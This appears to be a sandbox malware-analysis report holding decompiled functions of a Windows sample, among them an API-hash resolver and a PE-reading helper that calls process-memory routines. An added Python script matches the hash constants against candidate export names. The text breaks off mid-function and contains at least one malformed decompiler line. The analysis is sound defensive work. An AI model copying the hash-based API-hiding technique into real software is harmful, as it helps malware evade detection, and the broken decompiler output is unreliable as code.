    												_t109 = _v20 + 4;
    												_v16 = _t89;
    												__eflags = _t89;
    												_v20 = _v20 + 4;
    												_t86 = _v28;
    												if(_t89 > 0) {
    													continue;
    												} else {
    												}
    												L29:
    												_t114 = _v12;
    												goto L30;
    											}
    											_t101 = 1;
    											goto L29;
    										}
    										L30:
    										_t83 = _v32;
    										_t114 = _t114 + 0x10;
    										_v12 = _t114;
    										_t123 = _t123 - 1;
    										__eflags = _t123;
    									} while (_t123 != 0);
    								}
    								return _t101;
    							}
    						} else {
    							_t70 = E00C53A19(_t105, _t98, _a28, _a24,  &_v12,  &_v8);
    							_t111 = _v12;
    							_t142 = _t140 + 0x14;
    							_t116 = _v8;
    							if(_t111 < _t116) {
    								_t17 = _t70 + 0xc; // 0xc
    								_t136 = _t17;
    								_t70 = _a24;
    								do {
    									if(_t70 >=  *((intOrPtr*)(_t136 - 0xc)) && _t70 <=  *((intOrPtr*)(_t136 - 8))) {
    										_t93 =  *_t136 << 4;
    										if( *((intOrPtr*)(_t136[1] + _t93 - 0xc)) == 0) {
    											L13:
    											_t94 = _t93 + _t136[1] + 0xfffffff0;
    											_t129 = _a4;
    											if(( *(_t93 + _t136[1] + 0xfffffff0) & 0x00000040) == 0) {
    												_push(1);
    												_t35 = _t136 - 0xc; // 0x0
    												E00C52842(_t98, _t116, _t136, _t129, _a8, _a12, _a16, _t98, _t94, 0, _t35, _a28, _a32);
    												_t116 = _v8;
    												_t142 = _t142 + 0x2c;
    												_t111 = _v12;
    											}
    										} else {
    											_t116 = _v8;
    											_t98 = _a20;
    											if( *((char*)( *((intOrPtr*)(_t136[1] + _t93 - 0xc)) + 8)) == 0) {
    												goto L13;
    											}
    										}
    										_t70 = _a24;
    									}
    									_t111 = _t111 + 1;
    									_t136 =  &(_t136[5]);
    									_v12 = _t111;
    								} while (_t111 < _t116);
    							}
    							goto L17;
    						}
    					} else {
    						__imp__EncodePointer(0);
    						_t130 = _t71;
    						if( *((intOrPtr*)(E00C537A2(_t98, _t105, __edx, _t119, _t130, _t144) + 8)) == _t130 ||  *_t119 == 0xe0434f4d ||  *_t119 == 0xe0434352) {
    							goto L6;
    						} else {
    							_t70 = E00C5393C(_t119, _a8, _a12, _a16, _t98, _a28, _a32);
    							_t140 = _t140 + 0x1c;
    							if(_t70 != 0) {
    								L17:
    								goto L18;
    							} else {
    								goto L6;
    							}
    						}
    					}
    				}
    			}

    (statement address column for E00C52C6F, detached from its code lines by extraction; covers 0x00c52c6f to 0x00c52e61)

    APIs
      • Part of subcall function 00C537A2: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C56215
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,00C68C4C), ref: 00C52C96
    • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 00C52CF2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 94%
    			/* API-hash resolver. Loads advapi32 and user32 so they are present in the loaded-module list,
    			   looks up three modules by hash (E10013CB0, whose subcall list shows it locating the PEB via
    			   NtQueryInformationProcess; the list walk itself is not on this page) and fills a global
    			   function-pointer table at 0x1001f340..0x1001f3d0 with exports looked up by hash (E10013BE0).
    			   Returns 0 on success, 1 if any module lookup fails. The hash routine is not on this page,
    			   so the API names behind the constants cannot be read off the report. Comments are editorial;
    			   the decompiler tested an undeclared _t4 where _t23, the only handle not otherwise checked,
    			   is meant, and that is corrected here. */
    			E10013E20(void* __ecx, void* __eflags) {
    				void* _t23;
    				void* _t59;
    				void* _t64;
    				void* _t69;
    
    				_t69 = __eflags;
    				_push(__ecx);
    				LoadLibraryW(L"advapi32.dll");
    				LoadLibraryW(L"user32.dll");
    				_t64 = E10013CB0(0x2eca438c, _t69); // module hash 1: eleven exports are taken from it
    				_t23 = E10013CB0(0x929b1529, _t69); // module hash 2: two exports
    				_t59 = E10013CB0(0x48fa9930, _t69); // module hash 3: one export
    				if(_t23 == 0 || _t64 == 0 || _t59 == 0) {
    					return 1;
    				} else {
    					 *0x1001f39c = E10013BE0(_t64, 0x3e08f78b);
    					 *0x1001f340 = E10013BE0(_t64, 0xb09315f4);
    					 *0x1001f37c = E10013BE0(_t64, 0xdf27514b);
    					 *0x1001f3b0 = E10013BE0(_t64, 0x95c03d0);
    					 *0x1001f394 = E10013BE0(_t64, 0xda68238f);
    					 *0x1001f3c4 = E10013BE0(_t64, 0x8b35a289);
    					 *0x1001f3c8 = E10013BE0(_t64, 0xd0861aa4);
    					 *0x1001f380 = E10013BE0(_t64, 0xf7c7ae42);
    					 *0x1001f3c0 = E10013BE0(_t64, 0x4f58972e);
    					 *0x1001f3a0 = E10013BE0(_t64, 0xefc7ea74);
    					 *0x1001f390 = E10013BE0(_t64, 0xcce95612);
    					 *0x1001f3a4 = E10013BE0(_t23, 0xecac43ec);
    					 *0x1001f3d0 = E10013BE0(_t23, 0x7b104372);
    					 *0x1001f398 = E10013BE0(_t59, 0xbebe71bd);
    					return 0;
    				}
    			}

    (statement address column for E10013E20, detached from its code lines by extraction; covers 0x10013e20 to 0x10013f7c)

    APIs
    • LoadLibraryW.KERNEL32(advapi32.dll), ref: 10013E35
    • LoadLibraryW.KERNEL32(user32.dll), ref: 10013E3C
      • Part of subcall function 10013CB0: GetModuleHandleW.KERNEL32(ntdll.dll,?,771CF162,?,?,?,?,?,10011147,?,?,100111E0), ref: 10013CC0
      • Part of subcall function 10013CB0: NtQueryInformationProcess.NTDLL(000000FF,00000000,?,?,?,?,?,?,00000018,?), ref: 10013D0F
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
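E10013E20 fills its function-pointer table from hash constants rather than import names, so the fourteen constants are the starting point for working out which APIs the sample uses. The script below is an added example, not code from the sample or from Joe Sandbox: it takes the constants from the decompiled function, hashes a list of candidate export names with two common hash algorithms, and reports which slots a candidate explains. The sample's real routine (E10013BE0) is not on this page, so ROR-13 and djb2 are guesses an analyst tries first, not the sample's algorithm, and the name list is constructed and deliberately short; an empty result from `resolve_page_table()` means the next step is to decompile E10013BE0 and add its routine to `CANDIDATE_ALGORITHMS`.

```python
from typing import Callable, Dict, Iterable, Tuple

MASK = 0xFFFFFFFF


def ror32(v: int, n: int) -> int:
    return ((v >> n) | (v << (32 - n))) & MASK


def ror13_hash(name: bytes) -> int:
    """ROR-13 additive hash over the name bytes plus the terminating NUL
    (the widely copied Metasploit block_api export hash). Candidate only."""
    h = 0
    for b in name + b"\0":
        h = (ror32(h, 13) + b) & MASK
    return h


def djb2_hash(name: bytes) -> int:
    """Bernstein djb2, h = h*33 + c from 5381, another common choice. Candidate only."""
    h = 5381
    for b in name:
        h = (h * 33 + b) & MASK
    return h


CANDIDATE_ALGORITHMS: Dict[str, Callable[[bytes], int]] = {
    "ror13": ror13_hash,
    "djb2": djb2_hash,
}

# Slot address -> hash constant, copied from the E10013BE0 calls in the decompiled E10013E20.
PAGE_TABLE: Dict[int, int] = {
    0x1001F39C: 0x3E08F78B, 0x1001F340: 0xB09315F4, 0x1001F37C: 0xDF27514B,
    0x1001F3B0: 0x095C03D0, 0x1001F394: 0xDA68238F, 0x1001F3C4: 0x8B35A289,
    0x1001F3C8: 0xD0861AA4, 0x1001F380: 0xF7C7AE42, 0x1001F3C0: 0x4F58972E,
    0x1001F3A0: 0xEFC7EA74, 0x1001F390: 0xCCE95612, 0x1001F3A4: 0xECAC43EC,
    0x1001F3D0: 0x7B104372, 0x1001F398: 0xBEBE71BD,
}

# Constructed candidate list: the APIs this report names plus a few common ones. A real run
# feeds every export of the suspected modules, taken from their export tables.
CANDIDATE_NAMES = [
    b"LoadLibraryW", b"LocalAlloc", b"LocalFree", b"GetModuleHandleW", b"GetCurrentProcess",
    b"NtQueryInformationProcess", b"NtQuerySystemInformation", b"RtlInitUnicodeString",
    b"RtlGetCurrentPeb", b"ReadProcessMemory", b"WriteProcessMemory", b"SetFilePointer",
    b"ReadFile", b"WriteFile", b"WideCharToMultiByte", b"MultiByteToWideChar",
    b"GetStringTypeW", b"EncodePointer", b"GetLastError", b"IsProcessorFeaturePresent",
]


def build_lookup(names: Iterable[bytes]) -> Dict[str, Dict[int, bytes]]:
    """Precompute hash -> name for every candidate algorithm."""
    names = list(names)
    return {alg: {fn(n): n for n in names} for alg, fn in CANDIDATE_ALGORITHMS.items()}


def resolve(table: Dict[int, int], names: Iterable[bytes]) -> Dict[int, Tuple[str, bytes]]:
    """slot -> (algorithm, export name) for every hash some candidate algorithm explains."""
    lookup = build_lookup(names)
    found: Dict[int, Tuple[str, bytes]] = {}
    for slot, h in table.items():
        for alg, by_hash in lookup.items():
            if h in by_hash:
                found[slot] = (alg, by_hash[h])
                break
    return found


def resolve_page_table(names: Iterable[bytes] = CANDIDATE_NAMES) -> Dict[int, Tuple[str, bytes]]:
    """Try the candidate algorithms against the constants taken from the page."""
    return resolve(PAGE_TABLE, names)


if __name__ == "__main__":
    hits = resolve_page_table()
    print(f"{len(hits)} of {len(PAGE_TABLE)} slots explained by the candidate algorithms")
    for slot, (alg, name) in sorted(hits.items()):
        print(f"  {slot:#010x} {alg:<6} {name.decode()}")
```

The three module constants (0x2eca438c, 0x929b1529, 0x48fa9930) go through E10013CB0 rather than E10013BE0 and may use a different hash (module-name hashes are often computed over the upper-cased UTF-16 name), so keep them out of the export table until that routine is recovered as well.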
    C-Code - Quality: 100%
    			E100144D0(void** __ecx, void** __edx) {
    				intOrPtr _v8;
    				char _v68;
    				intOrPtr _v72;
    				char _v76;
    				intOrPtr _v80;
    				void* _v84;
    				intOrPtr _v88;
    				void* _v92;
    				void* _t32;
    				void* _t35;
    				void** _t41;
    				long _t55;
    				void* _t56;
    
    				_v88 = 0x1001f2d0;
    				_v80 = 0x1001f2d0;
    				_t41 = __edx;
    				_v92 =  &_v68;
    				_t56 = 0;
    				_v84 = 0;
    				_v76 = 0;
    				_v72 =  *((intOrPtr*)(__ecx + 4));
    				if(E10014010( &_v92, __ecx, 0x40) == 0 || _v68 != 0x5a4d) {
    					L8:
    					return _t56;
    				} else {
    					_v76 =  *((intOrPtr*)(__ecx)) + _v8;
    					_t32 = LocalAlloc(0x40, 0x18);
    					_v92 = _t32;
    					if(_t32 == 0) {
    						goto L8;
    					} else {
    						E10014010( &_v92,  &_v76, 0x18);
    						_t55 =  ==  ? 0xf8 : 0x108;
    						_t35 = LocalAlloc(0x40, 0x108);
    						_v84 = _t35;
    						if(_t35 == 0) {
    							L7:
    							LocalFree(_v92);
    							goto L8;
    						} else {
    							_t56 = E10014010( &_v84,  &_v76, _t55);
    							if(_t56 == 0) {
    								LocalFree(_v84);
    								goto L7;
    							} else {
    								 *_t41 = _v84;
    								LocalFree(_v92);
    								return _t56;
    							}
    						}
    					}
    				}
    			}
    0x100144d8
    0x100144e4
    0x100144ec
    0x100144ee
    0x100144f2
    0x100144ff
    0x10014503
    0x10014507
    0x10014515
    0x100145cd
    0x100145d4
    0x1001452b
    0x10014535
    0x10014539
    0x1001453f
    0x10014545
    0x00000000
    0x1001454b
    0x10014555
    0x10014574
    0x1001457a
    0x10014580
    0x10014586
    0x100145c2
    0x100145c6
    0x00000000
    0x10014588
    0x10014596
    0x1001459d
    0x100145bc
    0x00000000
    0x1001459f
    0x100145a7
    0x100145a9
    0x100145b7
    0x100145b7
    0x1001459d
    0x10014586
    0x10014545

    APIs
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • LocalAlloc.KERNEL32(00000040,00000018,10012590), ref: 10014539
    • LocalAlloc.KERNEL32(00000040,00000108), ref: 1001457A
    • LocalFree.KERNEL32(?), ref: 100145A9
    • LocalFree.KERNEL32(?), ref: 100145BC
    • LocalFree.KERNEL32(?), ref: 100145C6
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 75%
    			E10007DF2(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				unsigned int _v20;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				char _v40;
    				intOrPtr _v48;
    				char _v52;
    				void* __ebx;
    				void* __edi;
    				void* _t86;
    				signed int _t92;
    				signed int _t93;
    				signed int _t94;
    				signed int _t100;
    				void* _t101;
    				void* _t102;
    				void* _t104;
    				void* _t107;
    				void* _t109;
    				void* _t111;
    				void* _t115;
    				char* _t116;
    				void* _t119;
    				signed int _t121;
    				signed int _t128;
    				signed int* _t129;
    				signed int _t136;
    				signed int _t137;
    				char _t138;
    				signed int _t139;
    				signed int _t142;
    				signed int _t146;
    				signed int _t151;
    				char _t156;
    				char _t157;
    				void* _t161;
    				unsigned int _t162;
    				signed int _t164;
    				signed int _t166;
    				signed int _t170;
    				void* _t171;
    				signed int* _t172;
    				signed int _t174;
    				signed int _t181;
    				signed int _t182;
    				signed int _t183;
    				signed int _t184;
    				signed int _t185;
    				signed int _t186;
    				signed int _t187;
    
    				_t171 = __edx;
    				_t181 = _a24;
    				if(_t181 < 0) {
    					_t181 = 0;
    				}
    				_t184 = _a8;
    				 *_t184 = 0;
    				E10002F77(0,  &_v52, _t171, _a36);
    				_t5 = _t181 + 0xb; // 0xb
    				if(_a12 > _t5) {
    					_t172 = _a4;
    					_t142 = _t172[1];
    					_v36 =  *_t172;
    					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
    					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
    						L11:
    						__eflags = _t142 & 0x80000000;
    						if((_t142 & 0x80000000) != 0) {
    							 *_t184 = 0x2d;
    							_t184 = _t184 + 1;
    							__eflags = _t184;
    						}
    						__eflags = _a28;
    						_v16 = 0x3ff;
    						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
    						__eflags = _t172[1] & 0x7ff00000;
    						_v32 = _t136;
    						_t86 = 0x30;
    						if((_t172[1] & 0x7ff00000) != 0) {
    							 *_t184 = 0x31;
    							_t185 = _t184 + 1;
    							__eflags = _t185;
    						} else {
    							 *_t184 = _t86;
    							_t185 = _t184 + 1;
    							_t164 =  *_t172 | _t172[1] & 0x000fffff;
    							__eflags = _t164;
    							if(_t164 != 0) {
    								_v16 = 0x3fe;
    							} else {
    								_v16 = _v16 & _t164;
    							}
    						}
    						_t146 = _t185;
    						_t186 = _t185 + 1;
    						_v28 = _t146;
    						__eflags = _t181;
    						if(_t181 != 0) {
    							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
    						} else {
    							 *_t146 = 0;
    						}
    						_t92 = _t172[1] & 0x000fffff;
    						__eflags = _t92;
    						_v20 = _t92;
    						if(_t92 > 0) {
    							L23:
    							_t33 =  &_v8;
    							 *_t33 = _v8 & 0x00000000;
    							__eflags =  *_t33;
    							_t147 = 0xf0000;
    							_t93 = 0x30;
    							_v12 = _t93;
    							_v20 = 0xf0000;
    							do {
    								__eflags = _t181;
    								if(_t181 <= 0) {
    									break;
    								}
    								_t119 = E100100C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
    								_t161 = 0x30;
    								_t121 = _t119 + _t161 & 0x0000ffff;
    								__eflags = _t121 - 0x39;
    								if(_t121 > 0x39) {
    									_t121 = _t121 + _t136;
    									__eflags = _t121;
    								}
    								_t162 = _v20;
    								_t172 = _a4;
    								 *_t186 = _t121;
    								_t186 = _t186 + 1;
    								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
    								_t147 = _t162 >> 4;
    								_t93 = _v12 - 4;
    								_t181 = _t181 - 1;
    								_v20 = _t162 >> 4;
    								_v12 = _t93;
    								__eflags = _t93;
    							} while (_t93 >= 0);
    							__eflags = _t93;
    							if(_t93 < 0) {
    								goto L39;
    							}
    							_t115 = E100100C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
    							__eflags = _t115 - 8;
    							if(_t115 <= 8) {
    								goto L39;
    							}
    							_t54 = _t186 - 1; // 0x10003a8b
    							_t116 = _t54;
    							_t138 = 0x30;
    							while(1) {
    								_t156 =  *_t116;
    								__eflags = _t156 - 0x66;
    								if(_t156 == 0x66) {
    									goto L33;
    								}
    								__eflags = _t156 - 0x46;
    								if(_t156 != 0x46) {
    									_t139 = _v32;
    									__eflags = _t116 - _v28;
    									if(_t116 == _v28) {
    										_t57 = _t116 - 1;
    										 *_t57 =  *(_t116 - 1) + 1;
    										__eflags =  *_t57;
    									} else {
    										_t157 =  *_t116;
    										__eflags = _t157 - 0x39;
    										if(_t157 != 0x39) {
    											 *_t116 = _t157 + 1;
    										} else {
    											 *_t116 = _t139 + 0x3a;
    										}
    									}
    									goto L39;
    								}
    								L33:
    								 *_t116 = _t138;
    								_t116 = _t116 - 1;
    							}
    						} else {
    							__eflags =  *_t172;
    							if( *_t172 <= 0) {
    								L39:
    								__eflags = _t181;
    								if(_t181 > 0) {
    									_push(_t181);
    									_t111 = 0x30;
    									_push(_t111);
    									_push(_t186);
    									E10001E90(_t181);
    									_t186 = _t186 + _t181;
    									__eflags = _t186;
    								}
    								_t94 = _v28;
    								__eflags =  *_t94;
    								if( *_t94 == 0) {
    									_t186 = _t94;
    								}
    								__eflags = _a28;
    								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
    								_t174 = _a4[1];
    								_t100 = E100100C0( *_a4, 0x34, _t174);
    								_t137 = 0;
    								_t151 = (_t100 & 0x000007ff) - _v16;
    								__eflags = _t151;
    								asm("sbb ebx, ebx");
    								if(__eflags < 0) {
    									L47:
    									 *(_t186 + 1) = 0x2d;
    									_t187 = _t186 + 2;
    									__eflags = _t187;
    									_t151 =  ~_t151;
    									asm("adc ebx, 0x0");
    									_t137 =  ~_t137;
    									goto L48;
    								} else {
    									if(__eflags > 0) {
    										L46:
    										 *(_t186 + 1) = 0x2b;
    										_t187 = _t186 + 2;
    										L48:
    										_t182 = _t187;
    										_t101 = 0x30;
    										 *_t187 = _t101;
    										__eflags = _t137;
    										if(__eflags < 0) {
    											L56:
    											__eflags = _t187 - _t182;
    											if(_t187 != _t182) {
    												L60:
    												_push(0);
    												_push(0xa);
    												_push(_t137);
    												_push(_t151);
    												_t102 = E10010140();
    												_v32 = _t174;
    												 *_t187 = _t102 + 0x30;
    												_t187 = _t187 + 1;
    												__eflags = _t187;
    												L61:
    												_t104 = 0x30;
    												_t183 = 0;
    												__eflags = 0;
    												 *_t187 = _t151 + _t104;
    												 *(_t187 + 1) = 0;
    												goto L62;
    											}
    											__eflags = _t137;
    											if(__eflags < 0) {
    												goto L61;
    											}
    											if(__eflags > 0) {
    												goto L60;
    											}
    											__eflags = _t151 - 0xa;
    											if(_t151 < 0xa) {
    												goto L61;
    											}
    											goto L60;
    										}
    										if(__eflags > 0) {
    											L51:
    											_push(0);
    											_push(0x3e8);
    											_push(_t137);
    											_push(_t151);
    											_t107 = E10010140();
    											_v32 = _t174;
    											 *_t187 = _t107 + 0x30;
    											_t187 = _t187 + 1;
    											__eflags = _t187 - _t182;
    											if(_t187 != _t182) {
    												L55:
    												_push(0);
    												_push(0x64);
    												_push(_t137);
    												_push(_t151);
    												_t109 = E10010140();
    												_v32 = _t174;
    												 *_t187 = _t109 + 0x30;
    												_t187 = _t187 + 1;
    												__eflags = _t187;
    												goto L56;
    											}
    											L52:
    											__eflags = _t137;
    											if(__eflags < 0) {
    												goto L56;
    											}
    											if(__eflags > 0) {
    												goto L55;
    											}
    											__eflags = _t151 - 0x64;
    											if(_t151 < 0x64) {
    												goto L56;
    											}
    											goto L55;
    										}
    										__eflags = _t151 - 0x3e8;
    										if(_t151 < 0x3e8) {
    											goto L52;
    										}
    										goto L51;
    									}
    									__eflags = _t151;
    									if(_t151 < 0) {
    										goto L47;
    									}
    									goto L46;
    								}
    							}
    							goto L23;
    						}
    					}
    					__eflags = 0;
    					if(0 != 0) {
    						goto L11;
    					} else {
    						_t183 = E100080F5(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
    						__eflags = _t183;
    						if(_t183 == 0) {
    							_t128 = E10010E40(_t184, 0x65);
    							_pop(_t166);
    							__eflags = _t128;
    							if(_t128 != 0) {
    								__eflags = _a28;
    								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
    								__eflags = _t170;
    								 *_t128 = _t170;
    								 *((char*)(_t128 + 3)) = 0;
    							}
    							_t183 = 0;
    						} else {
    							 *_t184 = 0;
    						}
    						goto L62;
    					}
    				} else {
    					_t129 = E100068B3();
    					_t183 = 0x22;
    					 *_t129 = _t183;
    					E100067F7();
    					L62:
    					if(_v40 != 0) {
    						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
    					}
    					return _t183;
    				}
    			}
    0x10007df2
    0x10007dfd
    0x10007e04
    0x10007e06
    0x10007e06
    0x10007e08
    0x10007e11
    0x10007e13
    0x10007e18
    0x10007e1e
    0x10007e34
    0x10007e39
    0x10007e3c
    0x10007e49
    0x10007e4e
    0x10007ea2
    0x10007eaa
    0x10007eac
    0x10007eae
    0x10007eb1
    0x10007eb1
    0x10007eb1
    0x10007eb7
    0x10007ebf
    0x10007ed2
    0x10007ed5
    0x10007ed7
    0x10007eda
    0x10007edb
    0x10007efc
    0x10007eff
    0x10007eff
    0x10007edd
    0x10007edd
    0x10007edf
    0x10007eea
    0x10007eea
    0x10007eec
    0x10007ef3
    0x10007eee
    0x10007eee
    0x10007eee
    0x10007eec
    0x10007f00
    0x10007f02
    0x10007f03
    0x10007f06
    0x10007f08
    0x10007f1c
    0x10007f0a
    0x10007f0a
    0x10007f0a
    0x10007f21
    0x10007f21
    0x10007f26
    0x10007f29
    0x10007f34
    0x10007f34
    0x10007f34
    0x10007f34
    0x10007f38
    0x10007f3f
    0x10007f40
    0x10007f43
    0x10007f46
    0x10007f46
    0x10007f48
    0x00000000
    0x00000000
    0x10007f60
    0x10007f67
    0x10007f6b
    0x10007f6e
    0x10007f71
    0x10007f73
    0x10007f73
    0x10007f73
    0x10007f75
    0x10007f78
    0x10007f7b
    0x10007f7d
    0x10007f85
    0x10007f8b
    0x10007f8e
    0x10007f91
    0x10007f92
    0x10007f95
    0x10007f98
    0x10007f98
    0x10007f9d
    0x10007fa0
    0x00000000
    0x00000000
    0x10007fb8
    0x10007fbd
    0x10007fc1
    0x00000000
    0x00000000
    0x10007fc5
    0x10007fc5
    0x10007fc8
    0x10007fc9
    0x10007fc9
    0x10007fcb
    0x10007fce
    0x00000000
    0x00000000
    0x10007fd0
    0x10007fd3
    0x10007fda
    0x10007fdd
    0x10007fe0
    0x10007ff6
    0x10007ff6
    0x10007ff6
    0x10007fe2
    0x10007fe2
    0x10007fe4
    0x10007fe7
    0x10007ff2
    0x10007fe9
    0x10007fec
    0x10007fec
    0x10007fe7
    0x00000000
    0x10007fe0
    0x10007fd5
    0x10007fd5
    0x10007fd7
    0x10007fd7
    0x10007f2b
    0x10007f2b
    0x10007f2e
    0x10007ff9
    0x10007ff9
    0x10007ffb
    0x10007ffd
    0x10008000
    0x10008001
    0x10008002
    0x10008003
    0x1000800b
    0x1000800b
    0x1000800b
    0x1000800d
    0x10008010
    0x10008013
    0x10008015
    0x10008015
    0x10008017
    0x10008029
    0x1000802d
    0x10008030
    0x10008037
    0x1000803f
    0x1000803f
    0x10008042
    0x10008044
    0x10008055
    0x10008055
    0x10008059
    0x10008059
    0x1000805c
    0x1000805e
    0x10008061
    0x00000000
    0x10008046
    0x10008046
    0x1000804c
    0x1000804c
    0x10008050
    0x10008063
    0x10008063
    0x10008067
    0x10008068
    0x1000806a
    0x1000806c
    0x100080ad
    0x100080ad
    0x100080af
    0x100080bc
    0x100080bc
    0x100080be
    0x100080c0
    0x100080c1
    0x100080c2
    0x100080c9
    0x100080cc
    0x100080ce
    0x100080ce
    0x100080cf
    0x100080d1
    0x100080d4
    0x100080d4
    0x100080d6
    0x100080d8
    0x00000000
    0x100080d8
    0x100080b1
    0x100080b3
    0x00000000
    0x00000000
    0x100080b5
    0x00000000
    0x00000000
    0x100080b7
    0x100080ba
    0x00000000
    0x00000000
    0x00000000
    0x100080ba
    0x10008073
    0x10008079
    0x10008079
    0x1000807b
    0x1000807c
    0x1000807d
    0x1000807e
    0x10008085
    0x10008088
    0x1000808a
    0x1000808b
    0x1000808d
    0x1000809a
    0x1000809a
    0x1000809c
    0x1000809e
    0x1000809f
    0x100080a0
    0x100080a7
    0x100080aa
    0x100080ac
    0x100080ac
    0x00000000
    0x100080ac
    0x1000808f
    0x1000808f
    0x10008091
    0x00000000
    0x00000000
    0x10008093
    0x00000000
    0x00000000
    0x10008095
    0x10008098
    0x00000000
    0x00000000
    0x00000000
    0x10008098
    0x10008075
    0x10008077
    0x00000000
    0x00000000
    0x00000000
    0x10008077
    0x10008048
    0x1000804a
    0x00000000
    0x00000000
    0x00000000
    0x1000804a
    0x10008044
    0x00000000
    0x10007f2e
    0x10007f29
    0x10007e50
    0x10007e52
    0x00000000
    0x10007e54
    0x10007e6a
    0x10007e6f
    0x10007e71
    0x10007e7d
    0x10007e83
    0x10007e84
    0x10007e86
    0x10007e88
    0x10007e93
    0x10007e93
    0x10007e96
    0x10007e98
    0x10007e98
    0x10007e9b
    0x10007e73
    0x10007e73
    0x10007e73
    0x00000000
    0x10007e71
    0x10007e20
    0x10007e20
    0x10007e27
    0x10007e28
    0x10007e2a
    0x100080dc
    0x100080e0
    0x100080e5
    0x100080e5
    0x100080f4
    0x100080f4

    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 82%
    			E00C59A8A(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
    				signed int _v8;
    				int _v12;
    				char _v16;
    				intOrPtr _v24;
    				char _v28;
    				void* _v40;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t34;
    				signed int _t40;
    				int _t46;
    				int _t53;
    				void* _t54;
    				int _t56;
    				signed int _t62;
    				int _t65;
    				short* _t66;
    				signed int _t67;
    				short* _t68;
    
    				_t34 =  *0xc6a004; // 0x26d30358
    				_v8 = _t34 ^ _t67;
    				E00C5499F(_t54,  &_v28, __edx, _a4);
    				_t56 = _a24;
    				if(_t56 == 0) {
    					_t53 =  *(_v24 + 8);
    					_t56 = _t53;
    					_a24 = _t53;
    				}
    				_t65 = 0;
    				_t40 = MultiByteToWideChar(_t56, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
    				_v12 = _t40;
    				if(_t40 == 0) {
    					L15:
    					if(_v16 != 0) {
    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
    					}
    					return E00C51252(_t54, _v8 ^ _t67, _t65, _t66);
    				}
    				_t54 = _t40 + _t40;
    				_t17 = _t54 + 8; // 0x8
    				asm("sbb eax, eax");
    				if((_t17 & _t40) == 0) {
    					_t66 = 0;
    					L11:
    					if(_t66 != 0) {
    						E00C53610(_t65, _t66, _t65, _t54);
    						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t66, _v12);
    						if(_t46 != 0) {
